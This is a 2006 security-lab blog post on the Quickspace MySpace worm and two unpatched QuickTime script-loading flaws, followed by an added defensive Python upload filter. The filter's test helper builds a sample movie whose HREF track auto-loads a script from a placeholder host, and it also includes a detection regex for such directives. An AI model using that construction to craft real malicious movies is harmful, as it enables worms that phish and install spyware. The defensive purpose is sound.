<<<
NEWS FROM THE LAB - Monday, December 11, 2006
>>>
Two Unpatched Apple QuickTime Vulnerabilities Still Imperil Users Posted by SGMasood @ 11:14 GMT

You all know the story by now: a week ago MySpace was attacked by the Quickspace worm, which abused an alleged "feature" of Apple QuickTime movie files to inject and execute malicious JavaScript in user profile pages. The malicious code attempted to phish accounts and to push spyware to an unspecified number of users, with the obvious hope of financial gain for the perpetrators. The primary cause that made the attack possible is not a MySpace flaw, but rather an Apple QuickTime feature that is clearly a security vulnerability: QuickTime neither enforces the same origin policy nor warns the user before loading and executing JavaScript from external resources, two things that all similar applications are expected to do. Flash, for example, allows embedded scripts, but it warns the user when a Flash application tries to access an external resource.

We have yet to see Apple acknowledge this as a security issue. On the contrary, it has claimed that this is a legitimate feature. Apple provided MySpace with a temporary, trivially evadable fix that was, controversially, distributed only to MySpace users, and only to those MySpace users who browse with IE. All other users of Apple QuickTime, including MySpace users on any browser other than IE, are still vulnerable. And since this fix was given only to MySpace, other websites remain open to an attack by a worm similar to Quickspace.


Our own investigation found the following:

1. Apart from the HREF track flaw exploited by the worm, Apple QuickTime is still vulnerable to a second, similar flaw that has been publicly known for quite some time. It can be exploited in the same way to achieve exactly the same result as the first flaw. The second flaw is obscure, remains unfixed, and we have not yet seen anyone draw attention to it or talk about fixing it. Any patch that fixes the first flaw but not the second is inadequate.

2. MySpace is still vulnerable to both flaws, and nothing prevents another web application worm from exploiting them.

3. We tested a few other social networking sites, and every site we tested was likewise vulnerable to web application worms using the two flaws as an attack vector. With no fix available, the only feasible workaround for these social networking sites, and for other websites on the Net, is to block users from uploading Apple QuickTime content altogether. Scrubbing JavaScript from the content before accepting it would also work in principle, but it requires parsing the QuickTime container and rewriting the offending tracks, which is complex enough to be impractical in this case.

Recommendation: Websites should block Apple QuickTime content completely until a patch is available from Apple for both vulnerabilities.
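The following is an added example, not code from the original post or from Apple or MySpace: a server-side upload gate that implements the recommendation above by recognising QuickTime-family containers from their atom structure rather than from the file extension or the declared MIME type (both of which an uploader controls). As a diagnostic it also walks the movie's track user data for the "HREFTrack" name and scans the media data for auto-load directives of the form A<url>. The atom layout (4-byte big-endian size, 4-byte type, size 1 meaning a 64-bit size follows, size 0 meaning "to end of file"), the HREFTrack naming convention and the A<url> / T<frame> directive syntax are taken from Apple's QuickTime File Format documentation as the author understands it; the sample movie is constructed in memory for this example and the URL in it is a placeholder.

```python
"""Upload gate for QuickTime-family containers (added example, not the post's code).

Assumptions, stated in the lead-in: atom layout per Apple's QuickTime File Format
spec; HREF tracks are text tracks whose udta 'name' atom reads "HREFTrack" and
whose samples carry A<url> (auto-load) and T<frame> directives. The sample
movie built below is constructed for this example only.
"""
import re
import struct

TOP_LEVEL_ATOMS = {b"ftyp", b"moov", b"mdat", b"free", b"skip", b"wide", b"pnot"}
HREF_AUTOLOAD = re.compile(rb"A<([^<>]+)>")  # A<url> = load without a click


def iter_atoms(buf, start=0, end=None):
    """Yield (type, payload_start, payload_end) for each atom in buf[start:end].

    Stops at the first malformed atom instead of guessing; a truncated or
    oversized atom is treated as the end of the trustworthy data.
    """
    end = len(buf) if end is None else end
    pos = start
    while pos + 8 <= end:
        size, kind = struct.unpack(">I4s", buf[pos:pos + 8])
        header = 8
        if size == 1:  # 64-bit extended size follows the type field
            if pos + 16 > end:
                return
            size = struct.unpack(">Q", buf[pos + 8:pos + 16])[0]
            header = 16
        elif size == 0:  # atom extends to the end of the enclosing buffer
            size = end - pos
        if size < header or pos + size > end:
            return
        yield kind, pos + header, pos + size
        pos += size


def track_names(buf, start, end):
    """Walk moov -> trak -> udta -> name and yield each track's user-data name."""
    for kind, s, e in iter_atoms(buf, start, end):
        if kind != b"trak":
            continue
        for kind2, s2, e2 in iter_atoms(buf, s, e):
            if kind2 != b"udta":
                continue
            for kind3, s3, e3 in iter_atoms(buf, s2, e2):
                if kind3 == b"name":
                    yield buf[s3:e3]


def inspect(buf):
    """Return None if buf is not an atom stream, else what it contains."""
    atoms = list(iter_atoms(buf))
    if not atoms or atoms[0][0] not in TOP_LEVEL_ATOMS:
        return None
    info = {"brand": None, "track_names": [], "auto_load_urls": []}
    for kind, s, e in atoms:
        if kind == b"ftyp":
            info["brand"] = buf[s:s + 4]  # major brand, e.g. b"qt  "
        elif kind == b"moov":
            info["track_names"] = list(track_names(buf, s, e))
        elif kind == b"mdat":
            # Heuristic scan of raw media data; resolving the sample tables
            # properly is the "complex" part the post refers to.
            info["auto_load_urls"] += HREF_AUTOLOAD.findall(buf[s:e])
    info["has_href_track"] = b"HREFTrack" in info["track_names"]
    return info


def accept_upload(buf):
    """Policy from the post: reject any QuickTime-family container outright.

    Returns (accepted, reason). Extension and Content-Type are deliberately
    not consulted, since the uploader chooses both.
    """
    info = inspect(buf)
    if info is None:
        return True, "not a QuickTime/ISO-BMFF container"
    reason = "QuickTime container"
    if info["has_href_track"]:
        reason += " with HREFTrack"
    if info["auto_load_urls"]:
        reason += " auto-loading " + ", ".join(
            u.decode("latin-1") for u in info["auto_load_urls"])
    return False, reason


def atom(kind, payload=b""):
    """Serialise one atom with a 32-bit size (only used to build the sample)."""
    return struct.pack(">I4s", 8 + len(payload), kind) + payload


def build_sample_href_movie(with_ftyp=True):
    """Constructed sample: a movie whose only track is an HREF track.

    The URL is a placeholder. with_ftyp=False mimics older QuickTime files
    that begin directly with 'moov' and carry no 'ftyp' atom.
    """
    text = b"A<http://example.invalid/payload.js> T<myself>"
    sample = struct.pack(">H", len(text)) + text  # text sample: 16-bit length prefix
    trak = atom(b"trak", atom(b"udta", atom(b"name", b"HREFTrack")))
    moov = atom(b"moov", atom(b"mvhd", b"\x00" * 100) + trak)
    ftyp = atom(b"ftyp", b"qt  " + struct.pack(">I", 0x20050300) + b"qt  ")
    return (ftyp if with_ftyp else b"") + moov + atom(b"mdat", sample)


if __name__ == "__main__":
    print(accept_upload(build_sample_href_movie()))
    print(accept_upload(b"GIF89a" + b"\x00" * 20))
```

Because the gate keys off the atom stream, renaming payload.mov to payload.jpg or lying in the Content-Type header does not get the file past it, and an old-style movie with no ftyp atom is caught as well. The HREF scan is only a diagnostic: a site that wanted to scrub rather than block would still have to resolve the sample tables and rewrite the text track, which is why the post treats blocking as the only practical option.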

Bottom line: These are security vulnerabilities, not "features".